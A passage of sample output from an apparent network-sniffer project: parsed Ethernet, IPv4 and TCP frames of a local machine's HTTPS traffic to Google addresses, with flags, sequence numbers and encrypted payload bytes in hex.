0 761 | - Data: 762 | 763 | 764 | Ethernet Frame: 765 | - Destination: F8:E9:03:F4:5C:48, Source: DC:4A:3E:F5:40:A1, Protocol: 8 766 | - IPv4 Packet: 767 | - Version: 4, Header Length: 20, TTL: 64, 768 | - Protocol: 6, Source: 192.168.0.7, Target: 216.58.196.100 769 | - TCP Packet: 770 | - Source Port: 55326, Destination Port: 443 771 | - Sequence: 1139002261, Acknowledgement: 1019044744 772 | - Flags: 773 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 774 | - Data: 775 | 776 | 777 | Ethernet Frame: 778 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 779 | - IPv4 Packet: 780 | - Version: 4, Header Length: 20, TTL: 54, 781 | - Protocol: 6, Source: 216.58.196.100, Target: 192.168.0.7 782 | - TCP Packet: 783 | - Source Port: 443, Destination Port: 55326 784 | - Sequence: 1019044744, Acknowledgement: 1139002262 785 | - Flags: 786 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 787 | - Data: 788 | 789 | ^[[5~ 790 | Ethernet Frame: 791 | - Destination: F8:E9:03:F4:5C:48, Source: DC:4A:3E:F5:40:A1, Protocol: 8 792 | - IPv4 Packet: 793 | - Version: 4, Header Length: 20, TTL: 64, 794 | - Protocol: 6, Source: 192.168.0.7, Target: 216.58.196.100 795 | - TCP Packet: 796 | - Source Port: 55298, Destination Port: 443 797 | - Sequence: 2973260031, Acknowledgement: 1198294815 798 | - Flags: 799 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 800 | - Data: 801 | 802 | 803 | Ethernet Frame: 804 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 805 | - IPv4 Packet: 806 | - Version: 4, Header Length: 20, TTL: 54, 807 | - Protocol: 6, Source: 216.58.196.100, Target: 192.168.0.7 808 | - TCP Packet: 809 | - Source Port: 443, Destination Port: 55298 810 | - Sequence: 1198294815, Acknowledgement: 2973260032 811 | - Flags: 812 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 813 | - Data: 814 | 815 | 816 | Ethernet Frame: 817 | - Destination: F8:E9:03:F4:5C:48, Source: DC:4A:3E:F5:40:A1, Protocol: 8 818 | - IPv4 Packet: 819 | - Version: 4, Header Length: 20, TTL: 64, 820 | - Protocol: 6, Source: 192.168.0.7, Target: 172.217.24.238 821 | - TCP Packet: 822 | - Source Port: 43342, Destination Port: 443 823 | - Sequence: 1462042821, Acknowledgement: 3054121101 824 | - Flags: 825 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 826 | - Data: 827 | 828 | 829 | Ethernet Frame: 830 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 831 | - IPv4 Packet: 832 | - Version: 4, Header Length: 20, TTL: 59, 833 | - Protocol: 6, Source: 172.217.24.238, Target: 192.168.0.7 834 | - TCP Packet: 835 | - Source Port: 443, Destination Port: 43342 836 | - Sequence: 3054121101, Acknowledgement: 1462042822 837 | - Flags: 838 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 839 | - Data: 840 | 841 | 842 | Ethernet Frame: 843 | - Destination: F8:E9:03:F4:5C:48, Source: DC:4A:3E:F5:40:A1, Protocol: 8 844 | - IPv4 Packet: 845 | - Version: 4, Header Length: 20, TTL: 64, 846 | - Protocol: 6, Source: 192.168.0.7, Target: 172.217.24.238 847 | - TCP Packet: 848 | - Source Port: 43370, Destination Port: 443 849 | - Sequence: 2452434094, Acknowledgement: 490313818 850 | - Flags: 851 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 852 | - Data: 853 | 854 | 855 | Ethernet Frame: 856 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 857 | - IPv4 Packet: 858 | - Version: 4, Header Length: 20, TTL: 59, 859 | - Protocol: 6, Source: 172.217.24.238, Target: 192.168.0.7 860 | - TCP Packet: 861 | - Source Port: 443, Destination Port: 43370 862 | - Sequence: 490313818, Acknowledgement: 2452434095 863 | - Flags: 864 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 865 | - Data: 866 | 867 | 868 | Ethernet Frame: 869 | - Destination: F8:E9:03:F4:5C:48, Source: DC:4A:3E:F5:40:A1, Protocol: 8 870 | - IPv4 Packet: 871 | - Version: 4, Header Length: 20, TTL: 64, 872 | - Protocol: 6, Source: 192.168.0.7, Target: 216.58.196.99 873 | - TCP Packet: 874 | - Source Port: 54554, Destination Port: 443 875 | - Sequence: 3667296964, Acknowledgement: 3667872844 876 | - Flags: 877 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 878 | - Data: 879 | 880 | 881 | Ethernet Frame: 882 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 883 | - IPv4 Packet: 884 | - Version: 4, Header Length: 20, TTL: 54, 885 | - Protocol: 6, Source: 216.58.196.99, Target: 192.168.0.7 886 | - TCP Packet: 887 | - Source Port: 443, Destination Port: 54554 888 | - Sequence: 3667872844, Acknowledgement: 3667296965 889 | - Flags: 890 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 891 | - Data: 892 | 893 | 894 | Ethernet Frame: 895 | - Destination: F8:E9:03:F4:5C:48, Source: DC:4A:3E:F5:40:A1, Protocol: 8 896 | - IPv4 Packet: 897 | - Version: 4, Header Length: 20, TTL: 64, 898 | - Protocol: 6, Source: 192.168.0.7, Target: 172.217.24.238 899 | - TCP Packet: 900 | - Source Port: 43332, Destination Port: 443 901 | - Sequence: 2243770239, Acknowledgement: 1593808886 902 | - Flags: 903 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 904 | - Data: 905 | 906 | 907 | Ethernet Frame: 908 | - Destination: F8:E9:03:F4:5C:48, Source: DC:4A:3E:F5:40:A1, Protocol: 8 909 | - IPv4 Packet: 910 | - Version: 4, Header Length: 20, TTL: 64, 911 | - Protocol: 6, Source: 192.168.0.7, Target: 172.217.24.227 912 | - TCP Packet: 913 | - Source Port: 59880, Destination Port: 443 914 | - Sequence: 2416812747, Acknowledgement: 1992165705 915 | - Flags: 916 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 917 | - Data: 918 | 919 | 920 | Ethernet Frame: 921 | - Destination: F8:E9:03:F4:5C:48, Source: DC:4A:3E:F5:40:A1, Protocol: 8 922 | - IPv4 Packet: 923 | - Version: 4, Header Length: 20, TTL: 64, 924 | - Protocol: 6, Source: 192.168.0.7, Target: 172.217.24.227 925 | - TCP Packet: 926 | - Source Port: 59884, Destination Port: 443 927 | - Sequence: 605020789, Acknowledgement: 1253867306 928 | - Flags: 929 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 930 | - Data: 931 | 932 | 933 | Ethernet Frame: 934 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 935 | - IPv4 Packet: 936 | - Version: 4, Header Length: 20, TTL: 58, 937 | - Protocol: 6, Source: 172.217.24.227, Target: 192.168.0.7 938 | - TCP Packet: 939 | - Source Port: 443, Destination Port: 59880 940 | - Sequence: 1992165705, Acknowledgement: 0 941 | - Flags: 942 | - URG: 0, ACK: 0, PSH: 0, RST: 1, SYN: 0, fin: 0 943 | - Data: 944 | \x00\x00\x36\xd7\x5a\x81 945 | 946 | Ethernet Frame: 947 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 948 | - IPv4 Packet: 949 | - Version: 4, Header Length: 20, TTL: 58, 950 | - Protocol: 6, Source: 172.217.24.238, Target: 192.168.0.7 951 | - TCP Packet: 952 | - Source Port: 443, Destination Port: 43332 953 | - Sequence: 1593808886, Acknowledgement: 0 954 | - Flags: 955 | - URG: 0, ACK: 0, PSH: 0, RST: 1, SYN: 0, fin: 0 956 | - Data: 957 | \x00\x00\xfc\x75\xec\xb5 958 | 959 | Ethernet Frame: 960 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 961 | - IPv4 Packet: 962 | - Version: 4, Header Length: 20, TTL: 58, 963 | - Protocol: 6, Source: 172.217.24.227, Target: 192.168.0.7 964 | - TCP Packet: 965 | - Source Port: 443, Destination Port: 59884 966 | - Sequence: 1253867306, Acknowledgement: 0 967 | - Flags: 968 | - URG: 0, ACK: 0, PSH: 0, RST: 1, SYN: 0, fin: 0 969 | - Data: 970 | \x00\x00\x70\x97\x9e\xbe 971 | 972 | Ethernet Frame: 973 | - Destination: F8:E9:03:F4:5C:48, Source: DC:4A:3E:F5:40:A1, Protocol: 8 974 | - IPv4 Packet: 975 | - Version: 4, Header Length: 20, TTL: 64, 976 | - Protocol: 6, Source: 192.168.0.7, Target: 172.217.24.227 977 | - TCP Packet: 978 | - Source Port: 59918, Destination Port: 443 979 | - Sequence: 399128397, Acknowledgement: 3863023529 980 | - Flags: 981 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 982 | - Data: 983 | 984 | 985 | Ethernet Frame: 986 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 987 | - IPv4 Packet: 988 | - Version: 4, Header Length: 20, TTL: 59, 989 | - Protocol: 6, Source: 172.217.24.227, Target: 192.168.0.7 990 | - TCP Packet: 991 | - Source Port: 443, Destination Port: 59918 992 | - Sequence: 3863023529, Acknowledgement: 399128398 993 | - Flags: 994 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 995 | - Data: 996 | 997 | 998 | Ethernet Frame: 999 | - Destination: F8:E9:03:F4:5C:48, Source: DC:4A:3E:F5:40:A1, Protocol: 8 1000 | - IPv4 Packet: 1001 | - Version: 4, Header Length: 20, TTL: 64, 1002 | - Protocol: 6, Source: 192.168.0.7, Target: 216.58.212.206 1003 | - TCP Packet: 1004 | - Source Port: 52628, Destination Port: 443 1005 | - Sequence: 1263712278, Acknowledgement: 3139147331 1006 | - Flags: 1007 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 1008 | - Data: 1009 | 1010 | 1011 | Ethernet Frame: 1012 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 1013 | - IPv4 Packet: 1014 | - Version: 4, Header Length: 20, TTL: 47, 1015 | - Protocol: 6, Source: 216.58.212.206, Target: 192.168.0.7 1016 | - TCP Packet: 1017 | - Source Port: 443, Destination Port: 52628 1018 | - Sequence: 3139147331, Acknowledgement: 0 1019 | - Flags: 1020 | - URG: 0, ACK: 0, PSH: 0, RST: 1, SYN: 0, fin: 0 1021 | - Data: 1022 | \x00\x00\x48\xc3\x0a\x3d 1023 | 1024 | -------------------------------------------------------------------------------- /Network-Sniffer/data packets/youtube.txt: -------------------------------------------------------------------------------- 1 | 2 | Ethernet Frame: 3 | - Destination: F8:E9:03:F4:5C:48, Source: DC:4A:3E:F5:40:A1, Protocol: 8 4 | - IPv4 Packet: 5 | - Version: 4, Header Length: 20, TTL: 64, 6 | - Protocol: 6, Source: 192.168.0.7, Target: 172.217.27.206 7 | - TCP Packet: 8 | - Source Port: 49888, Destination Port: 443 9 | - Sequence: 3703328528, Acknowledgement: 2995710318 10 | - Flags: 11 | - URG: 0, ACK: 1, PSH: 1, RST: 0, SYN: 0, fin: 0 12 | - Data: 13 | \x1f\x35\x7a\x78\xfe\x54\xe3\xac\xb0\x6d\xf1\x76\x6f\x57\x6b\x8d\xb8\x2e\x89 14 | \xe0\x16\x11\x70\x1d\x8d\xaa\x03\x8a\x64\xcf\x04\xd5\xd0\x1c\x38\xb6\x1d\xfb 15 | \x95\x09\x05\x33\x7e\x24\x23\xce\xeb\xcc\x7c\xca\xff\xe3\xd6\x32\x76\x6f\x1b 16 | \x59\x48\x14\xdd\x0c\x36\x73\x35\x4a\x6f\x8f\x72\x23\xf4\xcc\x74\x70\x0a\xbd 17 | \xd3\xa8\x12\xe8\x18\x55\x6f\x08\xe4\x64\xb0\x07\xfc\xee\x6b\x1e\x1b\x00\x1d 18 | \x58\x99\xba\x94\xce\x74\x06\x55\x12\xf9\xc6\xf3\xd7\xf6\xb0\x26\x57\x3a\x0f 19 | \x77\xbd\x29\x02\x48\x13\xc0\x07\x72\xf6\xf7\xca\xb8\xf0\x54\x5d\x3a\xcf\x54 20 | \xb5\xb0\x70\xa5\xbb\xa5\x45\xc6\x39\x7b\x24\xe4\x62\x42\x78\x37\x4d\x7f\x04 21 | \x0f\x30 22 | 23 | Ethernet Frame: 24 | - Destination: F8:E9:03:F4:5C:48, Source: DC:4A:3E:F5:40:A1, Protocol: 8 25 | - IPv4 Packet: 26 | - Version: 4, Header Length: 20, TTL: 64, 27 | - Protocol: 6, Source: 192.168.0.7, Target: 172.217.27.206 28 | - TCP Packet: 29 | - Source Port: 49888, Destination Port: 443 30 | - Sequence: 3703328682, Acknowledgement: 2995710318 31 | - Flags: 32 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 33 | - Data: 34 | \x17\x03\x03\x09\x46\x00\x00\x00\x00\x00\x00\x00\x10\x6a\x13\x75\x12\x41\x8e 35 | \xec\xf8\x47\x37\x4f\x68\x21\x3b\xa0\xe0\xaf\x32\x0c\x73\x0f\x56\x92\x83\xe4 36 | \x44\x01\xd6\xf4\x1c\x00\x6f\x82\xff\x4e\x74\xa6\xe0\xcf\x8e\x5e\x67\x15\x14 37 | \x24\x6f\xfd\x69\xf8\x62\x20\x01\x33\x6c\x62\x81\x51\x25\x97\x1b\x00\x39\x07 38 | \xa9\x72\xe1\x26\x54\xf1\xfa\x8d\x65\x79\x37\xb7\xec\xfb\x98\xbc\xd5\x76\xa0 39 | \x34\x1e\x94\xe0\x94\xae\xb7\xa8\x5e\x1f\x8d\x54\xf8\xcf\xc5\x20\x54\xdd\x11 40 | \x86\x86\xa7\x10\x8f\x6d\x18\x96\xa0\x3d\x39\xf8\xa8\x2f\x75\xdb\x88\x14\x80 41 | \x24\x4b\x4e\xd8\x23\xd8\x7c\x5e\x5e\x1a\xd8\xd2\x65\xfa\x57\xe5\x43\x83\x0d 42 | \x5e\x94\x84\x2d\x36\xc5\x29\xeb\x4f\x74\xe6\x25\xfc\xab\xa0\x45\x9e\xfa\x8a 43 | \x71\xe8\x86\x9e\x4c\xc5\xc8\x8c\xf9\x42\x74\xb5\x70\x47\xf3\x48\x22\x52\x36 44 | \x09\x8f\x81\x81\x52\x76\xa7\xd9\x7d\x7b\xe4\x36\xdb\xdd\x5c\x4c\x7b\xe7\xc4 45 | \x62\x26\x9d\x51\x32\xc8\x81\xd1\x29\x80\x60\xb7\x10\xb2\xbe\xc8\x9f\xec\x10 46 | \xb5\x9c\x5f\x87\x2d\xd0\xb2\x04\x63\x8d\xd4\x3f\xf3\x60\x09\xe4\x29\x2a\x7b 47 | \xd7\xcb\x62\xf3\x88\x1b\x25\x15\x94\x58\xa5\x8a\x94\x40\x4e\xe8\x9f\xad\x86 48 | \x22\x9d\xcd\x56\xd9\xbd\x56\x8d\xb8\xf8\x0f\x1a\x6e\x14\xff\xec\x69\x29\xa3 49 | \xa7\x00\x56\x61\x76\x07\xde\x34\x42\x73\x62\xc3\x59\x99\x26\x8c\xe2\x63\x80 50 | \x5b\xe2\x62\xd4\xc9\x06\xe4\xcd\xda\x3f\x2c\x93\x81\x9e\x32\x03\x2a\x96\x26 51 | \xec\x74\x24\x55\xef\xa8\xd0\xce\x8b\xda\x4b\x6d\x27\x41\xdc\x33\x23\x41\x68 52 | \xea\xf6\xf2\x96\xa9\xf0\xf6\x07\x2a\x51\xcd\x7d\x18\x91\xbe\x88\xfb\xce\x25 53 | \xb8\x3c\x3f\x15\x5b\x6f\xcd\xab\xf4\xf4\xb4\xbb\xc5\x12\x14\xe2\x88\x5b\x75 54 | \xb5\xb5\xbb\x4c\x2e\xf6\xf5\x37\xd5\xac\x81\x3b\xf0\x9c\x0f\x2d\x65\x7f\xa5 55 | \x92\xec\xbb\x34\x4a\xa7\x33\xb7\x56\xaf\x58\x98\x88\xf4\xd4\x2a\x32\x81\x30 56 | \xbf\x68\xf0\x02\x4e\x36\x36\xf0\xb0\x01\x07\x1c\x41\xdc\xed\x55\xf2\x88\x39 57 | \x92\xdc\x17\x53\xb2\x77\xd6\x04\x2c\x60\x48\x51\xd6\xec\xa8\x1b\x65\x8d\xb2 58 | \x61\xd8\x2b\xb3\x3a\x0b\xea\x72\x10\x08\x41\x4f\x76\x67\xd4\x04\x3c\xb8\x77 59 | \xf6\xdb\x3e\xca\x0f\x47\xb8\xe7\x31\xe0\xa9\x58\xc1\x7a\xf4\x7b\xdf\x76\x78 60 | \x8a\x6f\x3c\x58\xc4\xd8\x57\xb6\x4c\x4d\x29\x64\x75\x3c\xd9\x5b\xe8\x1b\x3f 61 | \x71\x84\xc2\xf8\xdf\x80\x9c\xca\xd2\xb9\x0f\xc2\xb8\x7b\xdf\x13\x27\x3c\xf3 62 | \xc0\xba\x2d\xfa\x0a\x6f\x22\xef\x1b\x52\xda\x9e\x62\x82\x17\xa1\xa5\x4b\x0f 63 | \xa6\x79\x73\xe3\x40\x1c\x17\x3a\x50\xd9\xd0\x30\xf3\x76\xd1\xa0\xf5\x70\x36 64 | \xd5\x0b\x3c\x82\xaa\x87\x29\xd1\xc9\xf4\x28\x34\xbf\x3a\x02\x6b\x25\xea\x5d 65 | \x10\x37\x41\xad\xae\x8b\x95\x9e\x85\xcc\x7d\xe4\x71\xee\xe2\xf5\xc0\x0c\x6d 66 | \x2b\xa1\x95\x78\xf3\xa9\x9b\xba\xcb\x32\xc8\x4c\x69\x67\x10\x85\xeb\x02\x53 67 | \x9e\x70\xe6\x8f\x83\xc1\x99\x6d\x81\x48\x55\x89\xbb\xc5\xb5\x71\xd5\xd1\x96 68 | \x1b\x7d\xf9\x4e\xd0\x9f\x0f\x7b\xc0\x89\xd1\xa6\x94\x22\x65\x21\x5d\x52\xaa 69 | \xe5\x4c\xa9\x8a\xb1\x36\xec\x9d\xf5\x7d\x3d\x7a\x33\x8e\x74\x3d\x9f\xbb\x4f 70 | \x93\xba\x35\xd2\xae\x09\xc8\xb2\x6c\x1b\x72\xbd\xb1\x43\x8b\xc2\x30\x3a\xbc 71 | \x64\xac\xb5\x42\x17\x40\x8a\xd0\xeb\x94\xfd\x15\xd9\x50\xdd\x75\xfa\x79\x33 72 | \xa9\x88\x96\x41\xbd\x3c\x0c\xcc\x2a\xc2\xf1\x6f\x96\x8e\x4e\x28\x4b\x06\x96 73 | \x5f\xe1\xe4\xc8\x78\xd1\x18\x64\xa6\xeb\x66\x5b\xe2\xb2\x64\x5e\x82\x11\xa9 74 | \x70\x2a\xb9\xe7\x27\x01\xe3\x5d\xae\x9f\xe5\x45\x26\x11\x2d\x78\xeb\x02\xfc 75 | \xe0\x77\x43\x9f\x5d\x4d\xa5\x1d\x3d\xbc\x30\xf1\xb9\x4e\x1d\x1a\xd7\x0e\xf0 76 | \x2b\x38\x52\x34\x0f\x54\x9b\xe7\x6f\xe7\xf4\xc2\xfa\x05\x0d\xfd\xa6\x11\xe2 77 | \x4e\x99\x38\x68\x65\x4d\xb9\x19\xe2\x2b\x12\xd9\x54\xf8\x3d\xb7\xfb\x93\x93 78 | \x87\x42\x7f\xa5\x3a\xc1\x00\x30\xb3\x76\x6d\x9a\x61\x27\xd1\xb8\xbf\xb7\x5d 79 | \xe8\x20\xbe\xf9\xfa\x3f\xec\xff\xed\x3b\xd3\x2d\xfa\x30\xcc\xbd\x02\x75\xa6 80 | \x95\x63\x8d\x0e\x39\xe3\xbc\xe6\xb3\xd4\x34\xe1\x87\x46\x1b\x11\xfb\xd4\xb3 81 | \x12\x5d\x1d\x0a\x16\xb3\x0c\x2a\xbc\x41\x6f\x5b\x40\x00\x19\x56\x21\xd5\x04 82 | \x6e\x33\x09\x15\x8b\xb1\x49\x8a\x03\xa8\x61\x3b\x5a\x6b\xb0\xf9\xaf\xf7\x78 83 | \xe1\xa2\x48\x91\xa0\x80\x67\x3c\x2f\x0c\x00\x11\x12\xbe\x3e\xe6\x21\x6a\x44 84 | \xfd\xd0\xb4\xfa\x31\x6b\xd4\xbe\x76\x72\xcb\x58\x27\x21\x98\xb6\x2a\x62\xe2 85 | \x43\x6e\x0c\xda\x26\x27\xd5\x58\x42\x6e\x7a\x3a\x96\xf4\x41\x77\x90\xb9\x2b 86 | \xf9\x9c\xda\x29\x94\xe4\x68\xa6\x68\xc9\xcd\x9f\xbd\xf3\xfa\xff\x52\x82\x5b 87 | \xd6\x63\xb1\xb7\xd5\x98\x4e\x08\x41\xee\x20\x91\xa5\xb6\x82\xfa\xd3\x46\xb2 88 | \xe4\xbc\x31\x82\x60\xca\x25\xad\xa1\x9b\x05\xd9\x74\x30\x91\x2d\xc4\x99\x33 89 | \xac\xbe\x77\xc1\x9b\xba\x1a\x4d\x09\x2b\xd7\xb3\xf2\x4b\x51\x24\x5d\x3f\x01 90 | \xab\xd0\x54\x93\xc2\xd8\x00\x05\xc4\xe5\x6c\xb1\xe5\x40\x87\x07\x86\x9c\x89 91 | \xd3\x53\x59\x81\x65\xdb\x47\x17\x54\xf8\x03\x88\x5b\x0c\x22\x45\xe0\x54\x03 92 | \x60\x8c\x94\x31\x31\x1f\xef\x04\x74\xb9\x34\x62\xc4\xea\x5d\xfe\x86\x69\x47 93 | \xd8\x21\x3b\x8d\x12\x52\x2a\x3f\x5f\x02\x0f\x41\x37\x14\xb7\x8d\xd5\x12\x6f 94 | \x8c\xba\xd4\x61\x2b\x5d\x8c\x40\x35\xe5\xa2\x17\xf3\xfa\x0c\x87\x73\x3d\x35 95 | \xd7\x4c\x1b\x36\x1e\x96\x45\xcc\xc3\x27\x5b\x40\xb8\x07\xda\x32\xa0\xa3\x9a 96 | \xfd\x6e\xd6\xa9\x5e\x48\x67\x58\x45\x09\x2d\xdb\x9b\x70\x3f\x3e\x8f\x02\x76 97 | \x9b\xd5\x5f\x1a\x3c\xfd\xa2\x9d\x9b\x3c\x10\x3e\xf4\xcd\xb2\xef\xb7\x95\x00 98 | \xb6\x3c\xc4\x38\x93\xd2\x96\x48\x1e\x08\xe2\x51\xa6\x46\xee\x55\xfe\x48\x87 99 | \xb4\x10\x28\x7b\x5f\xc1\x75\x73\x83\x25\x20\xa5\x1c\x7a\x74\x0f\xa6\xb2\xaa 100 | \x48\xfb\xe4\x08\x00\x57\x14\xbe\x8d\x0f\x35\x7a\x47\xb4\x20\x66\x26\xd0\x3b 101 | \x2b\x90\x6e\x19\x0d\x8f\x49\xb4\xb6\x8a\xb5\x15\x14\x64\x02\xa3\x5a\x28\x46 102 | \xb7\x0a\x02\x6a\x41\xc6\x5e\x82\x0f\xa8\x85\x5c\xbd\x33\xd7\x73\xc8\x98\xb8 103 | \x20\xbb\xbe\x7a\x59\x25\x28\x69\xce\x16\xa0\x98\x0d\x19\xc6\xf2\x25\x8c\x2f 104 | \x98\x39\x45\xb8\xd4\x43\x02\x33\x16\x31\xfe\xe8\x75\xb1\x6c\xce\xb6\x8d\xae 105 | \xce\xbe\xe9\x63\xd1\x8e\xe4\x31\x32\xf3\xae\x0c\xf2\x32\x09\xe7\xc4\x78\xb8 106 | 107 | Ethernet Frame: 108 | - Destination: F8:E9:03:F4:5C:48, Source: DC:4A:3E:F5:40:A1, Protocol: 8 109 | - IPv4 Packet: 110 | - Version: 4, Header Length: 20, TTL: 64, 111 | - Protocol: 6, Source: 192.168.0.7, Target: 172.217.27.206 112 | - TCP Packet: 113 | - Source Port: 49888, Destination Port: 443 114 | - Sequence: 3703330050, Acknowledgement: 2995710318 115 | - Flags: 116 | - URG: 0, ACK: 1, PSH: 1, RST: 0, SYN: 0, fin: 0 117 | - Data: 118 | \xbf\xfe\x33\x39\x2b\x58\xae\x7d\xfe\xd8\x1c\xfe\x3b\x33\xc5\xfa\x16\xbe\x41 119 | \xe6\x4b\x38\x5a\x71\xcb\x87\xb4\xed\x6d\xd5\x4b\x24\x02\x49\x98\x0a\x7d\xc5 120 | \x54\xbe\xd0\x64\x22\x2c\xb3\x1c\x07\x58\xfb\x35\x4e\xd7\x5d\x64\xf3\x9b\xe3 121 | \xe7\x6f\x78\x47\x0f\xbf\xd9\xc4\x01\x61\x34\x23\x26\x13\x7b\xbf\x15\xed\x54 122 | \x5c\xa9\x33\x2e\x01\xc6\x86\x24\xb6\xaf\x84\x2c\xe4\xf0\xd7\x0d\xfd\x09\x5f 123 | \x13\xfc\x28\x2f\x4c\xd7\x8c\x71\x4b\x5f\xfd\x3b\x3d\x36\xb5\xa1\xbe\xbb\xd9 124 | \xcc\x6c\x4e\x92\x22\x9d\x71\xa4\x1f\x25\xe6\xf9\x87\xa4\x26\x20\xf9\x82\xb7 125 | \x75\xd6\x9e\x10\x62\x77\x98\x91\x74\x94\xa8\xbb\x84\x34\xb7\xa1\x39\xef\x04 126 | \x73\xa2\x5a\xea\x85\xe4\xb1\x6b\x6b\xd4\xb5\x93\xd6\x0c\x72\xf1\xb3\xc8\x1b 127 | \xa2\xa1\x11\x72\xd7\x61\xdf\xa9\xad\x98\x52\x5a\x5e\x4a\x75\xb3\x3a\xdc\x00 128 | \xb9\x5f\x45\xcd\xa8\xea\x0a\x75\x1b\xfd\x17\x04\xb9\xf3\xb8\xc4\x06\x9f\x66 129 | \xee\xa6\xb0\x24\xda\x7c\xe7\x42\x9f\x99\x5e\xbe\x58\x47\x81\xb8\xc2\x6d\xba 130 | \x68\x76\xec\x9c\x3c\x14\xe5\x0a\x45\x41\x00\x80\x8d\xe7\xaa\x7d\x4a\x9c\xfb 131 | \x0b\xb6\x48\x0a\x19\x02\x55\x6b\x80\x6a\x0a\x11\x73\x0c\x12\x49\xca\xa5\xf6 132 | \x9f\xf3\x60\x5e\x99\xf7\xc9\x8b\x97\x6b\x8d\xeb\x33\xf9\x84\xe1\x98\x79\xda 133 | \xd8\xea\xcf\x71\xf3\xe3\xbc\xc1\x41\x46\x06\x34\x38\x90\xf3\xea\x3a\x6a\xad 134 | \xca\x36\x48\x3a\xc8\xed\xf0\x0e\xe4\xe5\x8e\xb7\xac\x67\x66\xf7\x90\x7b\xab 135 | \x8a\x15\x24\x83\x78\x55\xdc\x90\xd8\x88\x97\x39\xbc\x58\x54\xb6\xc2\x22\x74 136 | \xb5\x13\x90\x53\x87\xb1\xfe\xc3\x7a\x58\xf1\x87\x99\x17\xcf\x9e\x6e\xaa\x48 137 | \x10\x38\x5c\xa9\x51\xa2\x60\xe7\x69\xed\x09\x53\x65\xb0\xb1\x3c\xd4\xfc\x95 138 | \x44\xa7\x1e\x68\x9e\xf5\x9a\xb5\xd7\x81\x4f\x07\x3e\x29\xc4\xf4\x6f\x0d\xbf 139 | \x52\xa8\x1f\x27\x5c\x53\xc8\x26\x48\x9c\xc4\x44\xd3\x95\x59\xf0\xb6\x1c\x73 140 | \x7f\xe5\x5f\x19\x89\xfa\xce\x8e\xbb\xe7\xc0\x91\xca\xf2\x54\xd7\xd0\x59\x0c 141 | \x96\x7e\x9d\x0d\xdc\x84\x23\x79\x5d\x77\x6c\x99\x56\xdf\x9f\xfb\x14\xbf\x76 142 | \x14\x02\x3d\x72\x9d\xad\xdc\x8c\xca\xc9\xc3\x44\xea\x3b\x0c\xad\x76\x8c\xbf 143 | \xd9\xe1\x15\x5d\x3e\x7a\xd8\x5b\x19\xdc\x4c\x1a\x2c\x88\x51\x4b\x70\x6c\x6e 144 | \xd9\xe8\xd7\xbd\xe2\xac\xe3\x1a\x89\xa4\xf7\x8b\x36\xf4\x70\xb3\xb5\xd2\xcf 145 | \xea\x91\x8b\x7c\xf7\xdb\x12\x16\x68\xe8\x7e\x57\x92\x59\xb6\x2e\x3c\x1c\xc8 146 | \xc2\x9a\xe9\xf5\x3d\xe0\xf1\x8c\xba\xa0\x4b\xc3\x46\x85\x90\x0c\x8c\x71\x43 147 | \x4d\x98\x92\xcf\x60\x09\x08\x25\x65\xb2\xb4\x63\xc5\x58\xae\x39\x4c\x30\x0c 148 | \x70\xe7\x72\x3c\xc7\xa4\x70\x54\xa4\x2f\x71\x6b\x6e\x2f\x49\x36\x05\x44\x82 149 | \x48\x6e\xb8\xe1\xfb\xfd\xf6\x05\xe9\xf8\xdd\x70\xe8\xe2\x82\x62\x57\xa8\xda 150 | \x75\xbd\x85\x69\xd6\x5c\x14\xf0\xff\x99\xc2\x70\xce\x6a\x2a\xf2\x1f\xd7\xa6 151 | \x0e\xfc\xe1\x8e\xa5\x2c\x6f\x89\x62\x03\x95\x98\x36\x6b\x0d\xdd\xe3\x72\x9a 152 | \xdf\x7e\x29\xa7\xed\xba\xdc\xcb\xec\xdc\xf6\xb9\xee\xb9\xc2\x2c\xa4\x74\x3f 153 | \x35\x12\xe2\xe0\xfb\xaa\x99\xe9\x41\x79\x02\x09\x2e\x31\xdd\x56\x13\x47\x15 154 | \x0c\x07\x55\x78\x24\xf0\xaf\xfa\x8f\x9c\x5a\x00\x84\xc7\xaa\x21\x58\x90\x97 155 | \x3a\xc4\x51\x9d\xb4\x27\xc4\x92\xdb\xbc\xf1\x3b\xac\x00\x85\xf5\x2f\xc2\x31 156 | \x8e\x1d\xee\x92\xb4\xb2\x81\x19\x34\x5c\x72\x40\xc6\x3e\x5e\x71\x97\xc2\x49 157 | \xfe\xdb\xf4\x61\xdc\x4b\x87\x60\x80\x61\x7c\x62\xba\x3c\x45\xbc\x59\x26\xc6 158 | 